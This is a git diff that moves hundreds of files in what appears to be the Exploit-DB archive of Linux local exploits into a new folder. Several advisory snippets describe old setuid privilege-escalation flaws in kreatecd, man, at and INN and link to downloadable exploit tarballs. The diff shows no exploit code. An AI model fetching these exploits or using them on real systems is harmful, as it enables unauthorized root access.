platforms/linux/local/19812.c rename to exploits/linux/local/19812.c diff --git a/platforms/linux/local/19813.txt b/exploits/linux/local/19813.txt similarity index 92% rename from platforms/linux/local/19813.txt rename to exploits/linux/local/19813.txt index 2916d80fc..a9eacbd59 100644 --- a/platforms/linux/local/19813.txt +++ b/exploits/linux/local/19813.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1061/info A vulnerability exists in the kreatecd program for Linux. This program is a graphical front end to the cdrecord program, and is installed setuid root. This program will blindly trust the configuration of the path to cdrecord, as specified by the user. This means that arbitrary programs can be executed as root by an attacker using kreatecd. It appears that graphical interaction is required to exploit this program. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19813.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19813.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/19816.txt b/exploits/linux/local/19816.txt similarity index 100% rename from platforms/linux/local/19816.txt rename to exploits/linux/local/19816.txt diff --git a/platforms/linux/local/19837.c b/exploits/linux/local/19837.c similarity index 100% rename from platforms/linux/local/19837.c rename to exploits/linux/local/19837.c diff --git a/platforms/linux/local/19838.c b/exploits/linux/local/19838.c similarity index 100% rename from platforms/linux/local/19838.c rename to exploits/linux/local/19838.c diff --git a/platforms/linux/local/19867.txt b/exploits/linux/local/19867.txt similarity index 100% rename from platforms/linux/local/19867.txt rename to exploits/linux/local/19867.txt diff --git a/platforms/linux/local/19883.c b/exploits/linux/local/19883.c similarity index 100% rename from platforms/linux/local/19883.c rename to exploits/linux/local/19883.c diff --git a/platforms/linux/local/19900.c b/exploits/linux/local/19900.c similarity index 100% rename from platforms/linux/local/19900.c rename to exploits/linux/local/19900.c diff --git a/platforms/linux/local/19915.txt b/exploits/linux/local/19915.txt similarity index 94% rename from platforms/linux/local/19915.txt rename to exploits/linux/local/19915.txt index aa7da354b..79d292ce4 100644 --- a/platforms/linux/local/19915.txt +++ b/exploits/linux/local/19915.txt @@ -4,4 +4,4 @@ Some linux distributions (S.u.S.E. 6.4 reported) ship with kscd (a CD player for Red Hat, Linux Mandrake, and Turbo Linux do not currently ship with kscd setgid 'disk'. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19915.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19915.tgz \ No newline at end of file diff --git a/platforms/linux/local/19925.c b/exploits/linux/local/19925.c similarity index 100% rename from platforms/linux/local/19925.c rename to exploits/linux/local/19925.c diff --git a/platforms/linux/local/19933.rb b/exploits/linux/local/19933.rb similarity index 100% rename from platforms/linux/local/19933.rb rename to exploits/linux/local/19933.rb diff --git a/platforms/linux/local/19946.txt b/exploits/linux/local/19946.txt similarity index 100% rename from platforms/linux/local/19946.txt rename to exploits/linux/local/19946.txt diff --git a/platforms/linux/local/19952.c b/exploits/linux/local/19952.c similarity index 100% rename from platforms/linux/local/19952.c rename to exploits/linux/local/19952.c diff --git a/platforms/linux/local/19953.c b/exploits/linux/local/19953.c similarity index 100% rename from platforms/linux/local/19953.c rename to exploits/linux/local/19953.c diff --git a/platforms/linux/local/19954.c b/exploits/linux/local/19954.c similarity index 100% rename from platforms/linux/local/19954.c rename to exploits/linux/local/19954.c diff --git a/platforms/linux/local/19955.c b/exploits/linux/local/19955.c similarity index 100% rename from platforms/linux/local/19955.c rename to exploits/linux/local/19955.c diff --git a/platforms/linux/local/19969.c b/exploits/linux/local/19969.c similarity index 100% rename from platforms/linux/local/19969.c rename to exploits/linux/local/19969.c diff --git a/platforms/linux/local/19970.c b/exploits/linux/local/19970.c similarity index 100% rename from platforms/linux/local/19970.c rename to exploits/linux/local/19970.c diff --git a/platforms/linux/local/19979.pl b/exploits/linux/local/19979.pl similarity index 100% rename from platforms/linux/local/19979.pl rename to exploits/linux/local/19979.pl diff --git a/platforms/linux/local/19980.pl b/exploits/linux/local/19980.pl similarity index 100% rename from platforms/linux/local/19980.pl rename to exploits/linux/local/19980.pl diff --git a/platforms/linux/local/19981.sh b/exploits/linux/local/19981.sh similarity index 100% rename from platforms/linux/local/19981.sh rename to exploits/linux/local/19981.sh diff --git a/platforms/linux/local/19991.c b/exploits/linux/local/19991.c similarity index 100% rename from platforms/linux/local/19991.c rename to exploits/linux/local/19991.c diff --git a/platforms/linux/local/19992.c b/exploits/linux/local/19992.c similarity index 100% rename from platforms/linux/local/19992.c rename to exploits/linux/local/19992.c diff --git a/platforms/linux/local/20000.c b/exploits/linux/local/20000.c similarity index 100% rename from platforms/linux/local/20000.c rename to exploits/linux/local/20000.c diff --git a/platforms/linux/local/20001.sh b/exploits/linux/local/20001.sh similarity index 100% rename from platforms/linux/local/20001.sh rename to exploits/linux/local/20001.sh diff --git a/platforms/linux/local/20004.c b/exploits/linux/local/20004.c similarity index 100% rename from platforms/linux/local/20004.c rename to exploits/linux/local/20004.c diff --git a/platforms/linux/local/20013.c b/exploits/linux/local/20013.c similarity index 100% rename from platforms/linux/local/20013.c rename to exploits/linux/local/20013.c diff --git a/platforms/linux/local/20021.txt b/exploits/linux/local/20021.txt similarity index 100% rename from platforms/linux/local/20021.txt rename to exploits/linux/local/20021.txt diff --git a/platforms/linux/local/20024.c b/exploits/linux/local/20024.c similarity index 100% rename from platforms/linux/local/20024.c rename to exploits/linux/local/20024.c diff --git a/platforms/linux/local/2004.c b/exploits/linux/local/2004.c similarity index 100% rename from platforms/linux/local/2004.c rename to exploits/linux/local/2004.c diff --git a/platforms/linux/local/20045.c b/exploits/linux/local/20045.c similarity index 100% rename from platforms/linux/local/20045.c rename to exploits/linux/local/20045.c diff --git a/platforms/linux/local/2005.c b/exploits/linux/local/2005.c similarity index 100% rename from platforms/linux/local/2005.c rename to exploits/linux/local/2005.c diff --git a/platforms/linux/local/2006.c b/exploits/linux/local/2006.c similarity index 100% rename from platforms/linux/local/2006.c rename to exploits/linux/local/2006.c diff --git a/platforms/linux/local/20093.c b/exploits/linux/local/20093.c similarity index 100% rename from platforms/linux/local/20093.c rename to exploits/linux/local/20093.c diff --git a/platforms/linux/local/2011.sh b/exploits/linux/local/2011.sh similarity index 100% rename from platforms/linux/local/2011.sh rename to exploits/linux/local/2011.sh diff --git a/platforms/linux/local/2013.c b/exploits/linux/local/2013.c similarity index 100% rename from platforms/linux/local/2013.c rename to exploits/linux/local/2013.c diff --git a/platforms/linux/local/20141.pl b/exploits/linux/local/20141.pl similarity index 100% rename from platforms/linux/local/20141.pl rename to exploits/linux/local/20141.pl diff --git a/platforms/linux/local/20142.sh b/exploits/linux/local/20142.sh similarity index 100% rename from platforms/linux/local/20142.sh rename to exploits/linux/local/20142.sh diff --git a/platforms/linux/local/2015.py b/exploits/linux/local/2015.py similarity index 100% rename from platforms/linux/local/2015.py rename to exploits/linux/local/2015.py diff --git a/platforms/linux/local/20155.txt b/exploits/linux/local/20155.txt similarity index 100% rename from platforms/linux/local/20155.txt rename to exploits/linux/local/20155.txt diff --git a/platforms/linux/local/2016.sh b/exploits/linux/local/2016.sh similarity index 100% rename from platforms/linux/local/2016.sh rename to exploits/linux/local/2016.sh diff --git a/platforms/linux/local/20160.txt b/exploits/linux/local/20160.txt similarity index 100% rename from platforms/linux/local/20160.txt rename to exploits/linux/local/20160.txt diff --git a/platforms/linux/local/20185.c b/exploits/linux/local/20185.c similarity index 100% rename from platforms/linux/local/20185.c rename to exploits/linux/local/20185.c diff --git a/platforms/linux/local/20201.c b/exploits/linux/local/20201.c similarity index 100% rename from platforms/linux/local/20201.c rename to exploits/linux/local/20201.c diff --git a/platforms/linux/local/20250.c b/exploits/linux/local/20250.c similarity index 100% rename from platforms/linux/local/20250.c rename to exploits/linux/local/20250.c diff --git a/platforms/linux/local/20251.c b/exploits/linux/local/20251.c similarity index 100% rename from platforms/linux/local/20251.c rename to exploits/linux/local/20251.c diff --git a/platforms/linux/local/20252.c b/exploits/linux/local/20252.c similarity index 100% rename from platforms/linux/local/20252.c rename to exploits/linux/local/20252.c diff --git a/platforms/linux/local/20285.c b/exploits/linux/local/20285.c similarity index 100% rename from platforms/linux/local/20285.c rename to exploits/linux/local/20285.c diff --git a/platforms/linux/local/20291.sh b/exploits/linux/local/20291.sh similarity index 100% rename from platforms/linux/local/20291.sh rename to exploits/linux/local/20291.sh diff --git a/platforms/linux/local/203.sh b/exploits/linux/local/203.sh similarity index 100% rename from platforms/linux/local/203.sh rename to exploits/linux/local/203.sh diff --git a/platforms/linux/local/2031.c b/exploits/linux/local/2031.c similarity index 100% rename from platforms/linux/local/2031.c rename to exploits/linux/local/2031.c diff --git a/platforms/linux/local/20312.c b/exploits/linux/local/20312.c similarity index 100% rename from platforms/linux/local/20312.c rename to exploits/linux/local/20312.c diff --git a/platforms/linux/local/20316.txt b/exploits/linux/local/20316.txt similarity index 100% rename from platforms/linux/local/20316.txt rename to exploits/linux/local/20316.txt diff --git a/platforms/linux/local/20338.c b/exploits/linux/local/20338.c similarity index 100% rename from platforms/linux/local/20338.c rename to exploits/linux/local/20338.c diff --git a/platforms/linux/local/20339.sh b/exploits/linux/local/20339.sh similarity index 100% rename from platforms/linux/local/20339.sh rename to exploits/linux/local/20339.sh diff --git a/platforms/linux/local/20341.sh b/exploits/linux/local/20341.sh similarity index 100% rename from platforms/linux/local/20341.sh rename to exploits/linux/local/20341.sh diff --git a/platforms/linux/local/20378.pl b/exploits/linux/local/20378.pl similarity index 100% rename from platforms/linux/local/20378.pl rename to exploits/linux/local/20378.pl diff --git a/platforms/linux/local/20385.sh b/exploits/linux/local/20385.sh similarity index 100% rename from platforms/linux/local/20385.sh rename to exploits/linux/local/20385.sh diff --git a/platforms/linux/local/20402.sh b/exploits/linux/local/20402.sh similarity index 100% rename from platforms/linux/local/20402.sh rename to exploits/linux/local/20402.sh diff --git a/platforms/linux/local/20411.c b/exploits/linux/local/20411.c similarity index 100% rename from platforms/linux/local/20411.c rename to exploits/linux/local/20411.c diff --git a/platforms/linux/local/20458.txt b/exploits/linux/local/20458.txt similarity index 100% rename from platforms/linux/local/20458.txt rename to exploits/linux/local/20458.txt diff --git a/platforms/linux/local/20493.sh b/exploits/linux/local/20493.sh similarity index 100% rename from platforms/linux/local/20493.sh rename to exploits/linux/local/20493.sh diff --git a/platforms/linux/local/205.pl b/exploits/linux/local/205.pl similarity index 100% rename from platforms/linux/local/205.pl rename to exploits/linux/local/205.pl diff --git a/platforms/linux/local/20517.c b/exploits/linux/local/20517.c similarity index 100% rename from platforms/linux/local/20517.c rename to exploits/linux/local/20517.c diff --git a/platforms/linux/local/20554.sh b/exploits/linux/local/20554.sh similarity index 100% rename from platforms/linux/local/20554.sh rename to exploits/linux/local/20554.sh diff --git a/platforms/linux/local/20555.sh b/exploits/linux/local/20555.sh similarity index 100% rename from platforms/linux/local/20555.sh rename to exploits/linux/local/20555.sh diff --git a/platforms/linux/local/20556.c b/exploits/linux/local/20556.c similarity index 100% rename from platforms/linux/local/20556.c rename to exploits/linux/local/20556.c diff --git a/platforms/linux/local/20581.c b/exploits/linux/local/20581.c similarity index 100% rename from platforms/linux/local/20581.c rename to exploits/linux/local/20581.c diff --git a/platforms/linux/local/206.c b/exploits/linux/local/206.c similarity index 100% rename from platforms/linux/local/206.c rename to exploits/linux/local/206.c diff --git a/platforms/linux/local/20604.sh b/exploits/linux/local/20604.sh similarity index 100% rename from platforms/linux/local/20604.sh rename to exploits/linux/local/20604.sh diff --git a/platforms/linux/local/20626.c b/exploits/linux/local/20626.c similarity index 100% rename from platforms/linux/local/20626.c rename to exploits/linux/local/20626.c diff --git a/platforms/linux/local/20645.c b/exploits/linux/local/20645.c similarity index 100% rename from platforms/linux/local/20645.c rename to exploits/linux/local/20645.c diff --git a/platforms/linux/local/20691.txt b/exploits/linux/local/20691.txt similarity index 100% rename from platforms/linux/local/20691.txt rename to exploits/linux/local/20691.txt diff --git a/platforms/linux/local/20720.c b/exploits/linux/local/20720.c similarity index 100% rename from platforms/linux/local/20720.c rename to exploits/linux/local/20720.c diff --git a/platforms/linux/local/20721.c b/exploits/linux/local/20721.c similarity index 100% rename from platforms/linux/local/20721.c rename to exploits/linux/local/20721.c diff --git a/platforms/linux/local/20776.c b/exploits/linux/local/20776.c similarity index 100% rename from platforms/linux/local/20776.c rename to exploits/linux/local/20776.c diff --git a/platforms/linux/local/20777.c b/exploits/linux/local/20777.c similarity index 100% rename from platforms/linux/local/20777.c rename to exploits/linux/local/20777.c diff --git a/platforms/linux/local/20778.sh b/exploits/linux/local/20778.sh similarity index 100% rename from platforms/linux/local/20778.sh rename to exploits/linux/local/20778.sh diff --git a/platforms/linux/local/20781.txt b/exploits/linux/local/20781.txt similarity index 100% rename from platforms/linux/local/20781.txt rename to exploits/linux/local/20781.txt diff --git a/platforms/linux/local/20795.sh b/exploits/linux/local/20795.sh similarity index 100% rename from platforms/linux/local/20795.sh rename to exploits/linux/local/20795.sh diff --git a/platforms/linux/local/20798.sh b/exploits/linux/local/20798.sh similarity index 100% rename from platforms/linux/local/20798.sh rename to exploits/linux/local/20798.sh diff --git a/platforms/linux/local/20822.sh b/exploits/linux/local/20822.sh similarity index 100% rename from platforms/linux/local/20822.sh rename to exploits/linux/local/20822.sh diff --git a/platforms/linux/local/20823.sh b/exploits/linux/local/20823.sh similarity index 100% rename from platforms/linux/local/20823.sh rename to exploits/linux/local/20823.sh diff --git a/platforms/linux/local/20843.txt b/exploits/linux/local/20843.txt similarity index 89% rename from platforms/linux/local/20843.txt rename to exploits/linux/local/20843.txt index cf911f3be..a0a3a8b33 100644 --- a/platforms/linux/local/20843.txt +++ b/exploits/linux/local/20843.txt @@ -4,4 +4,4 @@ A heap overflow vulnerability exists in the 'man' system manual pager program. The vulnerability exists due to a length check error when the -S option is given. As a result, it may be possible for a local user to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20843.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20843.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/20867.txt b/exploits/linux/local/20867.txt similarity index 100% rename from platforms/linux/local/20867.txt rename to exploits/linux/local/20867.txt diff --git a/platforms/linux/local/20868.txt b/exploits/linux/local/20868.txt similarity index 100% rename from platforms/linux/local/20868.txt rename to exploits/linux/local/20868.txt diff --git a/platforms/linux/local/20897.sh b/exploits/linux/local/20897.sh similarity index 100% rename from platforms/linux/local/20897.sh rename to exploits/linux/local/20897.sh diff --git a/platforms/linux/local/20898.sh b/exploits/linux/local/20898.sh similarity index 100% rename from platforms/linux/local/20898.sh rename to exploits/linux/local/20898.sh diff --git a/platforms/linux/local/209.c b/exploits/linux/local/209.c similarity index 100% rename from platforms/linux/local/209.c rename to exploits/linux/local/209.c diff --git a/platforms/linux/local/20900.txt b/exploits/linux/local/20900.txt similarity index 100% rename from platforms/linux/local/20900.txt rename to exploits/linux/local/20900.txt diff --git a/platforms/linux/local/20901.c b/exploits/linux/local/20901.c similarity index 100% rename from platforms/linux/local/20901.c rename to exploits/linux/local/20901.c diff --git a/platforms/linux/local/20926.txt b/exploits/linux/local/20926.txt similarity index 93% rename from platforms/linux/local/20926.txt rename to exploits/linux/local/20926.txt index f157eac25..c8ac907fd 100644 --- a/platforms/linux/local/20926.txt +++ b/exploits/linux/local/20926.txt @@ -6,4 +6,4 @@ The vulnerability exists due to the way the program handles manual page files be As a result, it may be possible for local users to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20926.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20926.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/20927.c b/exploits/linux/local/20927.c similarity index 100% rename from platforms/linux/local/20927.c rename to exploits/linux/local/20927.c diff --git a/platforms/linux/local/20928.sh b/exploits/linux/local/20928.sh similarity index 100% rename from platforms/linux/local/20928.sh rename to exploits/linux/local/20928.sh diff --git a/platforms/linux/local/20967.c b/exploits/linux/local/20967.c similarity index 100% rename from platforms/linux/local/20967.c rename to exploits/linux/local/20967.c diff --git a/platforms/linux/local/20979.c b/exploits/linux/local/20979.c similarity index 100% rename from platforms/linux/local/20979.c rename to exploits/linux/local/20979.c diff --git a/platforms/linux/local/20986.c b/exploits/linux/local/20986.c similarity index 100% rename from platforms/linux/local/20986.c rename to exploits/linux/local/20986.c diff --git a/platforms/linux/local/20988.c b/exploits/linux/local/20988.c similarity index 100% rename from platforms/linux/local/20988.c rename to exploits/linux/local/20988.c diff --git a/platforms/linux/local/20990.c b/exploits/linux/local/20990.c similarity index 100% rename from platforms/linux/local/20990.c rename to exploits/linux/local/20990.c diff --git a/platforms/linux/local/20992.c b/exploits/linux/local/20992.c similarity index 100% rename from platforms/linux/local/20992.c rename to exploits/linux/local/20992.c diff --git a/platforms/linux/local/21.c b/exploits/linux/local/21.c similarity index 100% rename from platforms/linux/local/21.c rename to exploits/linux/local/21.c diff --git a/platforms/linux/local/21010.sh b/exploits/linux/local/21010.sh similarity index 100% rename from platforms/linux/local/21010.sh rename to exploits/linux/local/21010.sh diff --git a/platforms/linux/local/21014.c b/exploits/linux/local/21014.c similarity index 100% rename from platforms/linux/local/21014.c rename to exploits/linux/local/21014.c diff --git a/platforms/linux/local/21043.c b/exploits/linux/local/21043.c similarity index 100% rename from platforms/linux/local/21043.c rename to exploits/linux/local/21043.c diff --git a/platforms/linux/local/21060.c b/exploits/linux/local/21060.c similarity index 100% rename from platforms/linux/local/21060.c rename to exploits/linux/local/21060.c diff --git a/platforms/linux/local/21061.c b/exploits/linux/local/21061.c similarity index 100% rename from platforms/linux/local/21061.c rename to exploits/linux/local/21061.c diff --git a/platforms/linux/local/21062.txt b/exploits/linux/local/21062.txt similarity index 95% rename from platforms/linux/local/21062.txt rename to exploits/linux/local/21062.txt index 65e2997c7..433fbb88c 100644 --- a/platforms/linux/local/21062.txt +++ b/exploits/linux/local/21062.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21062.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21062.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/21063.txt b/exploits/linux/local/21063.txt similarity index 95% rename from platforms/linux/local/21063.txt rename to exploits/linux/local/21063.txt index 8c467283e..9b70d099f 100644 --- a/platforms/linux/local/21063.txt +++ b/exploits/linux/local/21063.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21063.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21063.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/21124.txt b/exploits/linux/local/21124.txt similarity index 92% rename from platforms/linux/local/21124.txt rename to exploits/linux/local/21124.txt index 2bb21860a..438afddd4 100644 --- a/platforms/linux/local/21124.txt +++ b/exploits/linux/local/21124.txt @@ -6,4 +6,4 @@ Attackers can exploit this to elevate privileges. Note: There are currently conflicting reports about the exploitability of this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21124.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21124.tgz \ No newline at end of file diff --git a/platforms/linux/local/21158.c b/exploits/linux/local/21158.c similarity index 100% rename from platforms/linux/local/21158.c rename to exploits/linux/local/21158.c diff --git a/platforms/linux/local/21159.c b/exploits/linux/local/21159.c similarity index 100% rename from platforms/linux/local/21159.c rename to exploits/linux/local/21159.c diff --git a/platforms/linux/local/21216.sh b/exploits/linux/local/21216.sh similarity index 100% rename from platforms/linux/local/21216.sh rename to exploits/linux/local/21216.sh diff --git a/platforms/linux/local/21217.sh b/exploits/linux/local/21217.sh similarity index 100% rename from platforms/linux/local/21217.sh rename to exploits/linux/local/21217.sh diff --git a/platforms/linux/local/21218.sh b/exploits/linux/local/21218.sh similarity index 100% rename from platforms/linux/local/21218.sh rename to exploits/linux/local/21218.sh diff --git a/platforms/linux/local/21219.sh b/exploits/linux/local/21219.sh similarity index 100% rename from platforms/linux/local/21219.sh rename to exploits/linux/local/21219.sh diff --git a/platforms/linux/local/21226.c b/exploits/linux/local/21226.c similarity index 100% rename from platforms/linux/local/21226.c rename to exploits/linux/local/21226.c diff --git a/platforms/linux/local/21227.sh b/exploits/linux/local/21227.sh similarity index 100% rename from platforms/linux/local/21227.sh rename to exploits/linux/local/21227.sh diff --git a/platforms/linux/local/21229.txt b/exploits/linux/local/21229.txt similarity index 93% rename from platforms/linux/local/21229.txt rename to exploits/linux/local/21229.txt index e12b1d281..e8e06ca23 100644 --- a/platforms/linux/local/21229.txt +++ b/exploits/linux/local/21229.txt @@ -4,4 +4,4 @@ at is a freely available, open source scheduler package. It is included with var Under some circumstances, at does not correctly handle time input. A local user attempting to schedule a task via commandline execution and using a maliciously crafted time format can cause heap corruption in at. As the at program is installed setuid root in most implementations, this could result in the execution of arbitrary code with administrative privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21229.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21229.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/21231.c b/exploits/linux/local/21231.c similarity index 100% rename from platforms/linux/local/21231.c rename to exploits/linux/local/21231.c diff --git a/platforms/linux/local/21247.c b/exploits/linux/local/21247.c similarity index 100% rename from platforms/linux/local/21247.c rename to exploits/linux/local/21247.c diff --git a/platforms/linux/local/21248.txt b/exploits/linux/local/21248.txt similarity index 95% rename from platforms/linux/local/21248.txt rename to exploits/linux/local/21248.txt index 19cda9238..7e0506542 100644 --- a/platforms/linux/local/21248.txt +++ b/exploits/linux/local/21248.txt @@ -6,4 +6,4 @@ UML does not correctly protect kernel address space from user programs within th This is a known problem with the current UML implementation. Memory protection may be partially implemented at this time. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21248.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21248.tgz \ No newline at end of file diff --git a/platforms/linux/local/21258.bat b/exploits/linux/local/21258.bat similarity index 100% rename from platforms/linux/local/21258.bat rename to exploits/linux/local/21258.bat diff --git a/platforms/linux/local/21259.java b/exploits/linux/local/21259.java similarity index 100% rename from platforms/linux/local/21259.java rename to exploits/linux/local/21259.java diff --git a/platforms/linux/local/21280.c b/exploits/linux/local/21280.c similarity index 100% rename from platforms/linux/local/21280.c rename to exploits/linux/local/21280.c diff --git a/platforms/linux/local/21281.c b/exploits/linux/local/21281.c similarity index 100% rename from platforms/linux/local/21281.c rename to exploits/linux/local/21281.c diff --git a/platforms/linux/local/21302.c b/exploits/linux/local/21302.c similarity index 100% rename from platforms/linux/local/21302.c rename to exploits/linux/local/21302.c diff --git a/platforms/linux/local/21323.c b/exploits/linux/local/21323.c similarity index 100% rename from platforms/linux/local/21323.c rename to exploits/linux/local/21323.c diff --git a/platforms/linux/local/21341.c b/exploits/linux/local/21341.c similarity index 100% rename from platforms/linux/local/21341.c rename to exploits/linux/local/21341.c diff --git a/platforms/linux/local/21342.c b/exploits/linux/local/21342.c similarity index 100% rename from platforms/linux/local/21342.c rename to exploits/linux/local/21342.c diff --git a/platforms/linux/local/21348.txt b/exploits/linux/local/21348.txt similarity index 100% rename from platforms/linux/local/21348.txt rename to exploits/linux/local/21348.txt diff --git a/platforms/linux/local/21353.c b/exploits/linux/local/21353.c similarity index 100% rename from platforms/linux/local/21353.c rename to exploits/linux/local/21353.c diff --git a/platforms/linux/local/21356.sh b/exploits/linux/local/21356.sh similarity index 100% rename from platforms/linux/local/21356.sh rename to exploits/linux/local/21356.sh diff --git a/platforms/linux/local/21362.c b/exploits/linux/local/21362.c similarity index 100% rename from platforms/linux/local/21362.c rename to exploits/linux/local/21362.c diff --git a/platforms/linux/local/21375.txt b/exploits/linux/local/21375.txt similarity index 93% rename from platforms/linux/local/21375.txt rename to exploits/linux/local/21375.txt index a9f6b9f5c..4e247b67b 100644 --- a/platforms/linux/local/21375.txt +++ b/exploits/linux/local/21375.txt @@ -4,4 +4,4 @@ The Internet Software Consortium (ISC) Internet News (INN) project is a powerful Multiple vulnerabilities have been reported in two components of INN, inews and rnews. Reportedly, both are vulnerable to locally exploitable format string problems. Under some systems these binaries may be installed suid root or sgid news, allowing a local attacker to gain elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21375.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21375.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/21398.txt b/exploits/linux/local/21398.txt similarity index 100% rename from platforms/linux/local/21398.txt rename to exploits/linux/local/21398.txt diff --git a/platforms/linux/local/21420.c b/exploits/linux/local/21420.c similarity index 100% rename from platforms/linux/local/21420.c rename to exploits/linux/local/21420.c diff --git a/platforms/linux/local/2144.sh b/exploits/linux/local/2144.sh similarity index 100% rename from platforms/linux/local/2144.sh rename to exploits/linux/local/2144.sh diff --git a/platforms/linux/local/21458.txt b/exploits/linux/local/21458.txt similarity index 92% rename from platforms/linux/local/21458.txt rename to exploits/linux/local/21458.txt index d0c8142a3..b34fc0871 100644 --- a/platforms/linux/local/21458.txt +++ b/exploits/linux/local/21458.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4762/info An attacker with root access may be able to write to kernel memory in spite of the security patch provided by grsecurity. The patch operates by redirecting the write() system call, when it is being used to write to a memory device. Unfortunately, there are other methods that can be used to write to kernel memory (such as mapping the device to memory using mmap()). -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21458.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21458.tgz \ No newline at end of file diff --git a/platforms/linux/local/21496.c b/exploits/linux/local/21496.c similarity index 100% rename from platforms/linux/local/21496.c rename to exploits/linux/local/21496.c diff --git a/platforms/linux/local/21497.pl b/exploits/linux/local/21497.pl similarity index 100% rename from platforms/linux/local/21497.pl rename to exploits/linux/local/21497.pl diff --git a/platforms/linux/local/21499.txt b/exploits/linux/local/21499.txt similarity index 100% rename from platforms/linux/local/21499.txt rename to exploits/linux/local/21499.txt diff --git a/platforms/linux/local/215.c b/exploits/linux/local/215.c similarity index 100% rename from platforms/linux/local/215.c rename to exploits/linux/local/215.c diff --git a/platforms/linux/local/21500.txt b/exploits/linux/local/21500.txt similarity index 100% rename from platforms/linux/local/21500.txt rename to exploits/linux/local/21500.txt diff --git a/platforms/linux/local/21501.txt b/exploits/linux/local/21501.txt similarity index 100% rename from platforms/linux/local/21501.txt rename to exploits/linux/local/21501.txt diff --git a/platforms/linux/local/21502.txt b/exploits/linux/local/21502.txt similarity index 100% rename from platforms/linux/local/21502.txt rename to exploits/linux/local/21502.txt diff --git a/platforms/linux/local/21503.sh b/exploits/linux/local/21503.sh similarity index 100% rename from platforms/linux/local/21503.sh rename to exploits/linux/local/21503.sh diff --git a/platforms/linux/local/21504.sh b/exploits/linux/local/21504.sh similarity index 100% rename from platforms/linux/local/21504.sh rename to exploits/linux/local/21504.sh diff --git a/platforms/linux/local/21505.c b/exploits/linux/local/21505.c similarity index 100% rename from platforms/linux/local/21505.c rename to exploits/linux/local/21505.c diff --git a/platforms/linux/local/21506.c b/exploits/linux/local/21506.c similarity index 100% rename from platforms/linux/local/21506.c rename to exploits/linux/local/21506.c diff --git a/platforms/linux/local/21507.sh b/exploits/linux/local/21507.sh similarity index 100% rename from platforms/linux/local/21507.sh rename to exploits/linux/local/21507.sh diff --git a/platforms/linux/local/21538.c b/exploits/linux/local/21538.c similarity index 100% rename from platforms/linux/local/21538.c rename to exploits/linux/local/21538.c diff --git a/platforms/linux/local/21568.c b/exploits/linux/local/21568.c similarity index 100% rename from platforms/linux/local/21568.c rename to exploits/linux/local/21568.c diff --git a/platforms/linux/local/21583.pl b/exploits/linux/local/21583.pl similarity index 100% rename from platforms/linux/local/21583.pl rename to exploits/linux/local/21583.pl diff --git a/platforms/linux/local/21584.pl b/exploits/linux/local/21584.pl similarity index 100% rename from platforms/linux/local/21584.pl rename to exploits/linux/local/21584.pl diff --git a/platforms/linux/local/21585.c b/exploits/linux/local/21585.c similarity index 100% rename from platforms/linux/local/21585.c rename to exploits/linux/local/21585.c diff --git a/platforms/linux/local/216.c b/exploits/linux/local/216.c similarity index 100% rename from platforms/linux/local/216.c rename to exploits/linux/local/216.c diff --git a/platforms/linux/local/21623.txt b/exploits/linux/local/21623.txt similarity index 100% rename from platforms/linux/local/21623.txt rename to exploits/linux/local/21623.txt diff --git a/platforms/linux/local/21624.py b/exploits/linux/local/21624.py similarity index 100% rename from platforms/linux/local/21624.py rename to exploits/linux/local/21624.py diff --git a/platforms/linux/local/21666.txt b/exploits/linux/local/21666.txt similarity index 100% rename from platforms/linux/local/21666.txt rename to exploits/linux/local/21666.txt diff --git a/platforms/linux/local/21667.c b/exploits/linux/local/21667.c similarity index 100% rename from platforms/linux/local/21667.c rename to exploits/linux/local/21667.c diff --git a/platforms/linux/local/21674.c b/exploits/linux/local/21674.c similarity index 100% rename from platforms/linux/local/21674.c rename to exploits/linux/local/21674.c diff --git a/platforms/linux/local/21683.c b/exploits/linux/local/21683.c similarity index 100% rename from platforms/linux/local/21683.c rename to exploits/linux/local/21683.c 